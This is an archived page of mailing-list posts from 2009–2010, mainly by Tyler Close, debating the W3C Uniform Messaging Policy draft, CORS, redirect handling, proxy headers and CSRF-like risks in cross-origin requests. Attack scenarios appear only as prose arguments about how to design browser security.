http://waterken.sourceforge.net/recent.html



Re: [UMP] Proxy-Authorization

2010-01-10 Thread Tyler Close
On Sat, Jan 9, 2010 at 10:50 AM, Adam Barth w...@adambarth.com wrote:
 The UMP spec says:

 [[
 The user agent must not add any information obtained from: HTTP
 cookies, HTTP Auth headers, client certificates, or the referring
 resource, including its origin (other than the request parameters).
 ]]

 Does this include the Proxy-Authorization header?  If so, how can
 clients behind proxies that require authorization use web sites that
 depend on UMP?

Good catch. I've updated the text on sending a uniform request to
account for this proxy information. The new text is:


3.2 Sending a Uniform Request

The content of a uniform request is determined solely by the provided
uniform request parameters, the user-agent's response cache and the
required structure of an HTTP request. If a user-agent is configured
to send the request via a proxy, instead of directly to the host
specified by the request URL, this proxy configuration information can
be used to send the request to the proxy. In this case, the request
sent by the user-agent is not a uniform request; however, the request
ultimately delivered to the resource host will be, since any
Proxy-Authorization request header is removed by the proxy before
forwarding the request to the resource host. Other than this proxy
information, the user-agent must not augment the sent request with any
data that identifies the user or the origin of the request. In
particular, the user-agent must not add any information obtained from:
HTTP cookies, HTTP Auth headers, client certificates, or the referring
resource, including its origin (other than the request parameters).


See:
http://dev.w3.org/2006/waf/UMP/#request-sending

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Feedback on UMP from a quick read

2010-01-10 Thread Tyler Close
On Sun, Jan 10, 2010 at 6:54 AM, Maciej Stachowiak m...@apple.com wrote:
 What I meant to say was that the weak confidentiality
 protection for ECMAScript should not be used as an excuse to weaken
 protection for other resources.

And I was never proposing to weaken existing protection for other
resources. My reasoning rested on two points:
1. I thought this redirect behavior was the CORS defined behavior.
2. Even if it's not, this WG is currently defining the security model
for newly allowed cross-domain requests. It's reasonable to say that
if you refer to a resource using a guessable URL and respond to a
uniform GET request with a response marked as accessible by any
origin, then there's no confidentiality. This rule has no impact on
the security of existing resources, since they don't yet have a Same
Origin Policy opt-out header. This rule has the advantage of covering
up the bizarre Same Origin Policy handling of ECMAScript data, thus
eliminating a dangerous security gotcha for developers. It's bad when
developers think they've implemented a design that provides
confidentiality, and that turns out not to be true. We should be
trying for a simple set of rules that yield easily predictable
results.

 This is a leaky and awkward hole but it does
 not justify ignoring more general confidentiality concerns in any context.

Again, I wasn't doing that. I was looking at one very specific context
that doesn't even exist yet, because we're currently defining it.

 Adam's analogy was that the widespread existence of XSS bugs is not a reason
 to remove all cross-domain protection either.

That would be an extremely foolish thing to propose. I don't think I
was being extremely foolish. The analogy is a poor one.

 While it's not a 100% on-point
 analogy, I got the point he was making and I recognize that it is similar to
 my own.

In that case, please consider the argument I present at the top of
this email. The proposal is different from what you've understood.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Feedback on UMP from a quick read

2010-01-09 Thread Tyler Close
On Fri, Jan 8, 2010 at 4:56 PM, Adam Barth w...@adambarth.com wrote:
 On Fri, Jan 8, 2010 at 4:43 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Fri, Jan 8, 2010 at 3:56 PM, Adam Barth w...@adambarth.com wrote:
 [... Requiring uniform responses to redirects ...]
 It's a good thing to question, since this feature is a
 relaxation of the model, but it seems valuable and without risk. Can
 you think of a danger here?

 Here's an obscure risk:

 1) An enterprise (example.com) has a partially open redirector
 (go.corp.example.com) behind their firewall
 2) The redirector will only redirect to *.example.com
 3) There is a public site api.example.com that opts into UMP

 Now the attacker can probe go.corp.example.com by asking for redirects
 to api.example.com and reading back the response.

 I actually considered that case and convinced myself that the attacker
 *could* mount the attack using a form or iframe by timing the
 request. A working redirect will likely take longer to return than a
 broken redirect. Also, the attack can work without timing, but using a
 script tag, if the response can be parsed as ECMAScript.

 This is especially
 problematic if the redirector attaches interesting bits to the URLs it
 directs (like API keys).  This attack is not possible with the form
 element.

 Any unguessable bits in the redirect URL should not be revealed, since
 the attacker does not get access to the non-uniform redirect response,
 even if the final response is a uniform response.

 This design is also already dangerous, since using a form tag, the
 attacker can already freely exercise these API keys.

 You're assuming the API keys are for integrity.  What if they're for
 confidentiality?

If the response can be parsed as ECMAScript, an attacker can break
confidentiality by loading the document using a script tag. Also,
for any media-type, the attacker can mount a clickjacking attack
against this design. Since in general this design cannot be made safe,
I think it's better to not support it at all in the security model, by
allowing a uniform request to follow a non-uniform redirect. A
security model that works for some media-types but not others is just
too bizarre to explain to developers. This choice doesn't endanger
existing resources, since CORS also allows a cross-origin request to
follow a redirect that has not opted out of the Same Origin Policy.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Feedback on UMP from a quick read

2010-01-09 Thread Tyler Close
On Fri, Jan 8, 2010 at 3:36 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Fri, Jan 8, 2010 at 1:41 PM, Adam Barth w...@adambarth.com wrote:
 What happens with Set-Cookie headers included in uniform responses?
 It seems like we ought to ignore them based on the principle that UMP
 requests are made from a state store / context that is completely
 separate from the user agents normal state store / context.

 That's a good point. I'll add text to that effect.

This new text is at:

http://dev.w3.org/2006/waf/UMP/#state-changes

I've also removed the recommendation to omit headers about the user-agent.

http://dev.w3.org/2006/waf/UMP/#request-sending

Thanks,
--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Feedback on UMP from a quick read

2010-01-09 Thread Tyler Close
On Sat, Jan 9, 2010 at 10:20 AM, Adam Barth w...@adambarth.com wrote:
 On Sat, Jan 9, 2010 at 7:23 AM, Tyler Close tyler.cl...@gmail.com wrote:
 Since in general this design cannot be made safe,
 I think it's better to not support it at all in the security model, by
 allowing a uniform request to follow a non-uniform redirect. A
 security model that works for some media-types but not others is just
 too bizarre to explain to developers.

 That's the security model we have.  For example, it's safe to return
 untrusted HTML tags with certain media types but not with others.

Just because the Same Origin Policy is full of bizarre gotchas doesn't
mean the UMP must also be. Using the UMP with permission tokens
eliminates several of the gotchas. I'm taking every opportunity I can
to provide developers with a more reasonable security model. Surely a
security expert must applaud this effort.

 This choice doesn't endanger
 existing resources, since CORS also allows a cross-origin request to
 follow a redirect that has not opted out of the Same Origin Policy.

 I'm glad you consider CORS to be the epitome of a secure design.  :)

Does the smiley imply that you don't consider CORS to be a good
example of secure design?

For myself, I was merely citing CORS as the original definition for
the semantics of the Access-Control-Allow-Origin: * header.

 (As Maciej says, CORS doesn't appear to have this hole.)

Indeed, I misread the section on simple requests:

http://www.w3.org/TR/access-control/#simple-cross-origin-request0

I didn't realize the algorithm was checking the response headers in
several different places. I guess that's one of the dangers of an
algorithmic specification: you must have the whole thing in mind
before you can make any statements about what it does or does not do.

Given this correction, I'm reconsidering following of non-uniform
redirects. I still don't like that it makes it look like your example
design is safe, when in fact there are several non-confidentiality
problems with it, and using JSON for the final response also breaks
confidentiality.

 As Maciej says, just because the server can screw up it's
 confidentiality doesn't means we should prevent servers from doing the
 secure thing.  By this argument, we should remove the same-origin
 policy entirely because some sites might have XSS vulnerabilities.

Deciding to use a popular and standard media-type in its intended
setting is not at all comparable to filling your site with XSS
vulnerabilities. I did not read Maciej's email as suggesting
otherwise.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Feedback on UMP from a quick read

2010-01-09 Thread Tyler Close
On Sat, Jan 9, 2010 at 2:23 PM, Adam Barth w...@adambarth.com wrote:
 On Sat, Jan 9, 2010 at 1:57 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Sat, Jan 9, 2010 at 10:20 AM, Adam Barth w...@adambarth.com wrote:
 That's the security model we have.  For example, it's safe to return
 untrusted HTML tags with certain media types but not with others.

 Just because the Same Origin Policy is full of bizarre gotchas doesn't
 mean the UMP must also be. Using the UMP with permission tokens
 eliminates several of the gotchas. I'm taking every opportunity I can
 to provide developers with a more reasonable security model. Surely a
 security expert must applaud this effort.

 You're making the security model *weaker* though.  Why not make it stronger?

 Your reaction to a small (i.e., partial) leak of information in one
 media type is to open the floodgates for leaking all information about
 all media types.  That doesn't make any sense.

Originally, you characterized your scenario as obscure. Now you say
it's opening the floodgates. I don't find your frequent outbursts of
hyperbole at all constructive. Others have pointed this out more
subtly, but I guess you didn't get the hint.

In any case, I thought following of non-uniform redirects was the
original semantics introduced by CORS and so decided to retain it.
Like I said in the last email, I am reconsidering that based on
Maciej's correction.

And just to be clear. In no reasonable way can either decision be said
to open the floodgates. I also don't see any reasonable way to
conclude that the UMP security model is weaker than CORS. Those are
some pretty outlandish claims to try to prove.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Feedback on UMP from a quick read

2010-01-08 Thread Tyler Close
On Fri, Jan 8, 2010 at 1:41 PM, Adam Barth w...@adambarth.com wrote:
 [[
 In particular, the user agent should not add the HTTP headers:
 User-Agent, Accept, Accept-Language, Accept-Encoding, or
 Accept-Charset
 ]]

 This seems a bit overly constrictive.  Maybe we should send Accept: */*, 
 etc?

 More generally, I suspect the requirements in Section 3.2 violate
 various HTTP RFCs.  Maybe we should use the term willful violation
 somewhere?

Which RFCs are you referring to? AFAIK, Section 3.2 doesn't violate
any MUST requirement in any relevant RFC.

There are two uses for this requirement:
1. On browsers that don't yet support any cross-domain API, it would
be nice to emulate support by routing the request through the
requestor's Origin server. To help ensure the response is the same
whether it was sent directly from the user agent or via the Origin
server, we omit any information about the sending software.
2. Omitting these headers can significantly reduce message size and so
improve performance.

 [[
 If the response to a uniform request is an HTTP redirect, it is
 handled as specified by [HTTP], whether or not the redirect is itself
 a uniform response. If the redirect is not a uniform response, the
 user-agent must still prevent the requesting content from accessing
 the content of the redirect itself, though a response to a redirected
 request might be accessible if it is a uniform response. If the
 response to a uniform request is an HTTP redirect, any redirected
 request must also be a uniform request.
 ]]

 This seems looser than needed.  It would be better if the redirect had
 to be a uniform response also.  There's a note in the spec The HTML
 form element can also follow any redirect, without restriction by
 the Same Origin Policy, but the form element also sends Accept and
 User-Agent headers.  What's the reason for excluding the headers but
 not requiring redirects to be uniform responses?

Somewhere in the list archives, I believe there's a message that
pointed out a need to remain compatible with existing HTTP redirection
software that cannot be (or won't be) updated to include the new
header. For example, if the page receives a URL from a URL shortening
service, it would be nice to be able to complete the request even if
the URL shortening service doesn't return uniform response redirects.
The form argument makes it clear that following a non-uniform
redirect doesn't introduce a security vulnerability. AFAICT, this
feature also doesn't lead the resource author into any poor design
choices. It's a good thing to question, since this feature is a
relaxation of the model, but it seems valuable and without risk. Can
you think of a danger here?

 What happens with Set-Cookie headers included in uniform responses?
 It seems like we ought to ignore them based on the principle that UMP
 requests are made from a state store / context that is completely
 separate from the user agents normal state store / context.

That's a good point. I'll add text to that effect.

Thanks,
--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Feedback on UMP from a quick read

2010-01-08 Thread Tyler Close
On Fri, Jan 8, 2010 at 2:53 PM, Adam Barth w...@adambarth.com wrote:
 One more question: the draft doesn't seem to provide any way to
 generate a uniform request.  Are we planning to have another
 specification for an API for generating these requests?

Similar to CORS, UMP is just the security model; separate API specs
define the API for making requests under that model. So, as XHR2 is to
CORS, a yet-to-come UniformRequest is to UMP.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] Feedback on UMP from a quick read

2010-01-08 Thread Tyler Close
On Fri, Jan 8, 2010 at 3:56 PM, Adam Barth w...@adambarth.com wrote:
 On Fri, Jan 8, 2010 at 3:36 PM, Tyler Close tyler.cl...@gmail.com wrote:
 There are two uses for this requirement:
 1. On browsers that don't yet support any cross-domain API, it would
 be nice to emulate support by routing the request through the
 requestor's Origin server. To help ensure the response is the same
 whether it was sent directly from the user agent or via the Origin
 server, we omit any information about the sending software.

 If this is an important consideration, then the server software can
 just copy the relevant headers.  I'm not sure there's a good security
 case to be made here for deviating from standard operating procedure.
 It seems quite sensible to send an Accept header of */* instead of
 omitting the header.

I'm not making a security argument here, just an engineering one. It
seems simpler and more efficient this way.

 2. Omitting these headers can significantly reduce message size and so
 improve performance.

 This seems like premature optimization to me.  Do you have benchmarks
 that show this has any impact on page load time (or any other metric
 you think is interesting)?

Reading Steve Souders stuff has impressed upon me the cost of message
size overhead. If you just open up a Firebug console, it's clear that
these headers are eating up a significant fraction of the MTU and so
splitting messages that should've gone over the wire in a single
packet.

All that said, perhaps it makes more sense to move this recommendation
to individual UMP API specs, such as UniformRequest, rather than deal
with it in the UMP spec, leaving it as purely about the security
model. At the very least, that delays the controversy. I'll remove the
text from the UMP spec.

 [... Requiring uniform responses to redirects ...]
 It's a good thing to question, since this feature is a
 relaxation of the model, but it seems valuable and without risk. Can
 you think of a danger here?

 Here's an obscure risk:

 1) An enterprise (example.com) has a partially open redirector
 (go.corp.example.com) behind their firewall
 2) The redirector will only redirect to *.example.com
 3) There is a public site api.example.com that opts into UMP

 Now the attacker can probe go.corp.example.com by asking for redirects
 to api.example.com and reading back the response.

I actually considered that case and convinced myself that the attacker
*could* mount the attack using a form or iframe by timing the
request. A working redirect will likely take longer to return than a
broken redirect. Also, the attack can work without timing, but using a
script tag, if the response can be parsed as ECMAScript.

 This is especially
 problematic if the redirector attaches interesting bits to the URLs it
 directs (like API keys).  This attack is not possible with the form
 element.

Any unguessable bits in the redirect URL should not be revealed, since
the attacker does not get access to the non-uniform redirect response,
even if the final response is a uniform response.

This design is also already dangerous, since using a form tag, the
attacker can already freely exercise these API keys.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



[UMP] A declarative version of Uniform Messaging Policy

2010-01-07 Thread Tyler Close
I've updated the UMP spec to use a declarative style and moved the
algorithmic specification to a non-normative appendix. Hopefully this
organization will appeal to fans of either style. See:

http://dev.w3.org/2006/waf/UMP/

I'm hoping to move UMP forward to FPWD as soon as possible. Please let
me know if there is anything I need to do to expedite this process.

Thanks,
--Tyler

On Tue, Jan 5, 2010 at 2:41 PM, Tyler Close tyler.cl...@gmail.com wrote:
 I've uploaded an updated version of Uniform Messaging Policy, Level
 One to the W3C web site. See:

 http://dev.w3.org/2006/waf/UMP/

 This version reflects feedback received to date and follows the
 document conventions of a FPWD.

 I look forward to any additional feedback.

 Thanks,
 --Tyler

 --
 Waterken News: Capability security on the Web
 http://waterken.sourceforge.net/recent.html




-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: [UMP] updated editor's draft of Uniform Messaging Policy on W3C site

2010-01-06 Thread Tyler Close
On Wed, Jan 6, 2010 at 1:58 AM, Anne van Kesteren ann...@opera.com wrote:
 On Tue, 05 Jan 2010 23:41:07 +0100, Tyler Close tyler.cl...@gmail.com
 wrote:

 I've uploaded an updated version of Uniform Messaging Policy, Level
 One to the W3C web site. See:

 http://dev.w3.org/2006/waf/UMP/

 This version reflects feedback received to date and follows the
 document conventions of a FPWD.

 I look forward to any additional feedback.

 It's still not clear to me how the use cases in

  http://dev.w3.org/2006/waf/access-control/#use-cases

 are done using UMP. My apologies if I missed a reply to my email asking for
 that.

Hi Anne, sorry for the delay in responding to your email.

Which of these use cases are you having difficulty with? There have
been several email threads about these use cases and corresponding
solutions using UMP. Are you saying you didn't understand any of them,
or one in particular, or is there one that was not covered?

Thanks,
--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



[UMP] updated editor's draft of Uniform Messaging Policy on W3C site

2010-01-05 Thread Tyler Close
I've uploaded an updated version of Uniform Messaging Policy, Level
One to the W3C web site. See:

http://dev.w3.org/2006/waf/UMP/

This version reflects feedback received to date and follows the
document conventions of a FPWD.

I look forward to any additional feedback.

Thanks,
--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Scientific Literature on Capabilities (was Re: CORS versus Uniform Messaging?)

2009-12-21 Thread Tyler Close
On Thu, Dec 17, 2009 at 5:49 PM, Ian Hickson i...@hixie.ch wrote:
 On Thu, 17 Dec 2009, Tyler Close wrote:

 Starting from the X-FRAME-OPTIONS proposal, say the response header
 also applies to all embedding that the page renderer does. So it also
 covers img, video, etc. In addition to the current values, the
 header can also list hostname patterns that may embed the content. So,
 in your case:

 X-FRAME-OPTIONS: *.example.com
 Access-Control-Allow-Origin: *

 Which means anyone can access this content, but sites outside
 *.example.com should host their own copy, rather than framing or
 otherwise directly embedding my copy.

 Why is this better than:

   Access-Control-Allow-Origin: *.example.com

X-FRAME-OPTIONS is a rendering instruction and
Access-Control-Allow-Origin is part of an access-control mechanism.
Combining the two in the way you propose creates an access-control
mechanism that is inherently vulnerable to CSRF-like attacks, because
it determines read access to bits based on the identity of the
requestor.

Using your example, assume an XML resource sitting on an intranet
server at resources.example.com. The author of this resource is trying
to restrict access to the XML data to only other intranet resources
hosted at *.example.com. The author believes this can be accomplished
by simply setting the Access-Control-Allow-Origin header as you've
show above, but that's not strictly true. Every page hosted on
*.example.com is now a potential target for a CSRF-like attack that
reveals the secret data. For example, consider a page at
victim.example.com that uses a third party storage service. To copy
data, the page does a GET on the location of the existing data,
followed by a POST to another location with the data to be copied. If
the storage service says the location of the existing data is the URL
for the secret XML data (http://resources.example.com/...), then the
victim page suffers a CSRF-like attack that exposes the secret data.
The victim page may know nothing of the existence or purpose of the
secret XML resource.

To avoid this pitfall, we instead design the access-control mechanism
to not create these traps. With the bogus technique removed, the
author of a protected resource can now choose amongst techniques that
actually work.

To address your bandwidth stealing concerns, and other similar issues,
we define X-FRAME-OPTIONS so that a resource author can inform the
browser's renderer of these preferences. So your XBL resource can
declare that it was only expecting to be applied to another resource
from *.example.com. The browser can detect this misconfiguration and
raise an error notification.

By separating the two mechanisms, we make the access-control model
clear and correct, while still providing the rendering control you
desired.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Scientific Literature on Capabilities (was Re: CORS versus Uniform Messaging?)

2009-12-21 Thread Tyler Close
On Mon, Dec 21, 2009 at 2:16 PM, Ian Hickson i...@hixie.ch wrote:
 On Mon, 21 Dec 2009, Tyler Close wrote:
 On Thu, Dec 17, 2009 at 5:49 PM, Ian Hickson i...@hixie.ch wrote:
  On Thu, 17 Dec 2009, Tyler Close wrote:
 
  Starting from the X-FRAME-OPTIONS proposal, say the response header
  also applies to all embedding that the page renderer does. So it also
  covers img, video, etc. In addition to the current values, the
  header can also list hostname patterns that may embed the content. So,
  in your case:
 
  X-FRAME-OPTIONS: *.example.com
  Access-Control-Allow-Origin: *
 
  Which means anyone can access this content, but sites outside
  *.example.com should host their own copy, rather than framing or
  otherwise directly embedding my copy.
 
  Why is this better than:
 
    Access-Control-Allow-Origin: *.example.com

 X-FRAME-OPTIONS is a rendering instruction and
 Access-Control-Allow-Origin is part of an access-control mechanism.
 Combining the two in the way you propose creates an access-control
 mechanism that is inherently vulnerable to CSRF-like attacks, because
 it determines read access to bits based on the identity of the
 requestor.

 Using your example, assume an XML resource sitting on an intranet
 server at resources.example.com. The author of this resource is trying
 to restrict access to the XML data to only other intranet resources
 hosted at *.example.com. The author believes this can be accomplished
 by simply setting the Access-Control-Allow-Origin header as you've
 show above, but that's not strictly true. Every page hosted on
 *.example.com is now a potential target for a CSRF-like attack that
 reveals the secret data. For example, consider a page at
 victim.example.com that uses a third party storage service. To copy
 data, the page does a GET on the location of the existing data,
 followed by a POST to another location with the data to be copied. If
 the storage service says the location of the existing data is the URL
 for the secret XML data (http://resources.example.com/...), then the
 victim page suffers a CSRF-like attack that exposes the secret data.
 The victim page may know nothing of the existence or purpose of the
 secret XML resource.

 To avoid this pitfall, we instead design the access-control mechanism
 to not create these traps. With the bogus technique removed, the
 author of a protected resource can now choose amongst techniques that
 actually work.

 To address your bandwidth stealing concerns, and other similar issues,
 we define X-FRAME-OPTIONS so that a resource author can inform the
 browser's renderer of these preferences. So your XBL resource can
 declare that it was only expecting to be applied to another resource
 from *.example.com. The browser can detect this misconfiguration and
 raise an error notification.

 By separating the two mechanisms, we make the access-control model
 clear and correct, while still providing the rendering control you
 desired.

 I don't understand the difference between opaque string origin
 opaque string and opaque string origin.

 With XBL in particular, what we need is something that decides whether a
 page can access the DOM of the XBL file or not, on a per-origin basis.
 Whether the magic string is:

   X-FRAME-OPTIONS: *.example.com
   Access-Control-Allow-Origin: *

 ...or:

   X-FRAME-OPTIONS: *.example.com

 ...or:

   Access-Control-Allow-Origin: *.example.com

 ...or:

   X: *.example.com

 ...or some other sequence of bytes doesn't seem to make any difference to
 any actual concrete security. There's only one mechanism here. Either
 access is granted to that origin, or it isn't.

No, there is a difference in access-control between the two designs.

In the two header design:
1) An XHR GET of the XBL file data by example.org *is* allowed.
2) An xbl import of the XBL data by example.org triggers a rendering error.

In the one header design:
1) An XHR GET of the XBL file data by example.org is *not* allowed.
2) An xbl import of the XBL data by example.org triggers a rendering error.

Under the two header design, everyone has read access to the raw bits
of the XBL file. The one header design makes an empty promise to
protect read access to the XBL file.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Scientific Literature on Capabilities (was Re: CORS versus Uniform Messaging?)

2009-12-21 Thread Tyler Close
On Mon, Dec 21, 2009 at 2:39 PM, Ian Hickson i...@hixie.ch wrote:
 On Mon, 21 Dec 2009, Tyler Close wrote:

 No, there is a difference in access-control between the two designs.

 In the two header design:
 1) An XHR GET of the XBL file data by example.org *is* allowed.
 2) An xbl import of the XBL data by example.org triggers a rendering error.

 That's a bad design. It would make people think they had secured the file
 when they had not.

The headers explicitly say that a read request from any Origin is allowed:

Access-Control-Allow-Origin: *

The above syntax is the one CORS came up with. How could it be made clearer?

 Security should be consistent across everything.

It is. All Origins have read access. The data just renders in a
different way depending on if/how it is embedded.

 In the one header design:
 1) An XHR GET of the XBL file data by example.org is *not* allowed.
 2) An xbl import of the XBL data by example.org triggers a rendering error.

 That's what I want.

What you want, and the mechanism you propose to get it, are at odds.
I've described the CSRF-like attack multiple times. The access control
model you propose doesn't actually work.

To actually control access to the XBL file data you need to use
something like the secret token designs we've discussed.

 Under the two header design, everyone has read access to the raw bits
 of the XBL file.

 That's a bad thing.

In the scenario you described, everyone *does*  have read access to
the raw bits. Anyone can just direct their browser to example.org and
save the data. In your scenario, we were just trying to discourage
bandwidth stealing.

 The one header design makes an empty promise to protect read access to
 the XBL file.

 How is it an empty promise?

See above.

We don't seem to be making any progress at understanding each other,
so I'm going to give up on this thread until I see some signs of
progress. Thanks for your time.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Scientific Literature on Capabilities (was Re: CORS versus Uniform Messaging?)

2009-12-17 Thread Tyler Close
On Thu, Dec 17, 2009 at 10:08 AM, Maciej Stachowiak m...@apple.com wrote:
 My goal was merely to argue that adding an origin/cookie check to a
 secret-token-based mechanism adds meaningful defense in depth, compared to
 just using any of the proposed protocols over UM. I believe my argument
 holds. If the secret token scheme has any weakness whatsoever, whether in
 generation of the tokens, or in accidental disclosure by the user or the
 service consumer, origin checks provide an orthogonal defense that must be
 breached separately. This greatly reduces the attack surface. While this may
 not provide any additional security in theory, where we can assume the
 shared secret is generated and managed correctly, it does provide additional
 security in the real world, where people make mistakes.

The reason the origin/cookie check doesn't provide defense in depth is
that the programming patterns we want to support necessarily blow
holes in any origin/cookie defense. We want clients to act as
deputies, because that's a useful thing to be able to do. For example,
consider a web page widget that implements the Observer pattern: when
its state changes, it fires off a POST request to a list of observer
URLs. Clients can register any URL they want with the web page widget.
If these POST requests carry origin/cookies, then a CSRF-like attack
is easy.

There are lots of other ways we want to use the Web, as it is meant to
be used, that aren't viable if you're trying to maintain the viability
of an origin/cookie defense. For example, Ian correctly points out
that under an origin/cookie defense, using URIs as identifiers is
dangerous, see:

http://lists.w3.org/Archives/Public/public-webapps/2009OctDec/1247.html

But we want to use URIs to identify things, because its useful, and we
want it to be safe. For cross-origin scenarios, it can't be safe while
still maintaining the viability of origin/cookie defenses.

Basically, the programming patterns of the Web, when used in
cross-origin scenarios, break origin/cookie defenses. We want to keep
the Web programming patterns and replace the origin/cookie defense
with something that better fits the Web. We're willing to give up our
cookies before we'll give up our URIs.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Scientific Literature on Capabilities (was Re: CORS versus Uniform Messaging?)

2009-12-17 Thread Tyler Close
On Thu, Dec 17, 2009 at 9:38 AM, Ian Hickson i...@hixie.ch wrote:
 One of the big reasons to restrict which origin can
 use a particular resource is bandwidth management. For example,
 resources.example.com might want to allow *.example.com to use its XBL
 files, but not allow anyone else to directly use the XBL files straight
 from resources.example.com.

An XBL file could include some JavaScript code that blows up the page
if the manipulated DOM has an unexpected document.domain.

I think this solution more precisely implements the control you want.
You're not trying to prevent other sites from downloading your XBL
file. You're only trying to encourage them to host their own version
of your XBL file.

In general, the control you want is most similar to iframe busting.
A separate standard that covers these rendering instructions would be
better than conflating them with an access-control standard. For
example, a new HTTP response header could provide instructions on what
embedding configurations are supported. The instructions may be
independent of how the embedding is created, such as by: iframe,
img, script or xbl.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Scientific Literature on Capabilities (was Re: CORS versus Uniform Messaging?)

2009-12-17 Thread Tyler Close
On Thu, Dec 17, 2009 at 3:46 PM, Ian Hickson i...@hixie.ch wrote:
 On Thu, 17 Dec 2009, Tyler Close wrote:
 On Thu, Dec 17, 2009 at 9:38 AM, Ian Hickson i...@hixie.ch wrote:
  One of the big reasons to restrict which origin can use a particular
  resource is bandwidth management. For example, resources.example.com
  might want to allow *.example.com to use its XBL files, but not allow
  anyone else to directly use the XBL files straight from
  resources.example.com.

 An XBL file could include some JavaScript code that blows up the page if
 the manipulated DOM has an unexpected document.domain.

 This again requires script. I don't deny there are plenty of solutions you
 could use to do this with script. The point is that CORS allows one line
 in an .htaccess file to solve this for all XBL files, all XML files, all
 videos, everything on a site, all at once.

I'm not trying to deny you your one line fix. I'm just saying it
should be a different one line than the one used for access control.
Conflating the two issues, the way CORS does, creates CSRF-like
problems. Address bandwidth management, along with other embedding
issues, while standardizing an iframe busting technique.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Scientific Literature on Capabilities (was Re: CORS versus Uniform Messaging?)

2009-12-17 Thread Tyler Close
On Thu, Dec 17, 2009 at 4:41 PM, Ian Hickson i...@hixie.ch wrote:
 On Thu, 17 Dec 2009, Tyler Close wrote:
 On Thu, Dec 17, 2009 at 3:46 PM, Ian Hickson i...@hixie.ch wrote:
  On Thu, 17 Dec 2009, Tyler Close wrote:
  On Thu, Dec 17, 2009 at 9:38 AM, Ian Hickson i...@hixie.ch wrote:
   One of the big reasons to restrict which origin can use a
   particular resource is bandwidth management. For example,
   resources.example.com might want to allow *.example.com to use its
   XBL files, but not allow anyone else to directly use the XBL files
   straight from resources.example.com.
 
  An XBL file could include some JavaScript code that blows up the page
  if the manipulated DOM has an unexpected document.domain.
 
  This again requires script. I don't deny there are plenty of solutions
  you could use to do this with script. The point is that CORS allows
  one line in an .htaccess file to solve this for all XBL files, all XML
  files, all videos, everything on a site, all at once.

 I'm not trying to deny you your one line fix. I'm just saying it should
 be a different one line than the one used for access control. Conflating
 the two issues, the way CORS does, creates CSRF-like problems. Address
 bandwidth management, along with other embedding issues, while
 standardizing an iframe busting technique.

 What one liner are your proposing that would solve the problem for XBL,
 XML data, videos, etc, all at once?

Well, I wasn't intending to make a frame busting proposal, but it
seems something like to following could work...

Starting from the X-FRAME-OPTIONS proposal, say the response header
also applies to all embedding that the page renderer does. So it also
covers img, video, etc. In addition to the current values, the
header can also list hostname patterns that may embed the content. So,
in your case:

X-FRAME-OPTIONS: *.example.com
Access-Control-Allow-Origin: *

Which means anyone can access this content, but sites outside
*.example.com should host their own copy, rather than framing or
otherwise directly embedding my copy.

--Tyler

-- 
Waterken News: Capability security on the Web
http://waterken.sourceforge.net/recent.html



Re: Scientific Literature on Capabilities (was Re: CORS versus Uniform Messaging?)

2009-12-15 Thread Tyler Close
On Mon, Dec 14, 2009 at 6:14 PM, Jonas Sicking jo...@sicking.cc wrote:
 On Mon, Dec 14, 2009 at 4:52 PM, Tyler Close tyler.cl...@gmail.com wrote:
 On Sun, Dec 13, 2009 at 6:15 PM, Maciej Stachowiak m...@apple.com wrote:
 There seem to be two schools of thought that to some extent inform the
 thinking of participants in this discussion:
 1) Try to encourage capability-based mechanisms by not providing anything
 that lets you extend the use of origins and cookies.
 2) Try to build on the model that already exists and that we are likely
 stuck with, and provide practical ways to mitigate its risks.

 My own perspective on this is:
 3) In scenarios involving more than 2 parties, the ACL model is
 inherently vulnerable to CSRF-like problems. So, for cross-origin
 scenarios, a non-ACL model solution is needed.

 The above is a purely practical perspective. When writing or auditing
 code, UM provides a way to eliminate an entire class of attacks. I
 view it the same way I do moving from C to a memory safe language to
 avoid buffer overflow and related attacks.

 For what it's worth, I'm not sure that eliminating is correct here.
 With UM, I can certainly see people doing things like using a wrapping
 library for all UM requests (very commonly done with XHR today), and
 then letting that library add the security token to the request.

Yes, I said provides a way to eliminate. I agree that UM doesn't by
itself eliminate CSRF in a way that can't be undone by poor
application design. The UM draft we sent to this list covers this
point in the Security Considerations section. See the second to last
paragraph in that section:

http://lists.w3.org/Archives/Public/public-webapps/2009OctDec/att-0931/draft.html#security

That paragraph reads:

Application designers should design protocols that transmit only those
permissions justified by the purpose of each request. These
permissions should not be context sensitive, such as apply delete
permission to any identifier in this request. Such a permission
creates the danger of a CSRF-like attack in which an attacker causes
an unexpected identifier to be in the request. Instead, a permission
should be specific, such as apply delete permission to resource foo.


UM provides a safe substrate for application protocols that are
invulnerable to CSRF-like attacks. Without UM, this can't be done
since the browser automatically adds credentials to all requests.

--Tyler

-- 
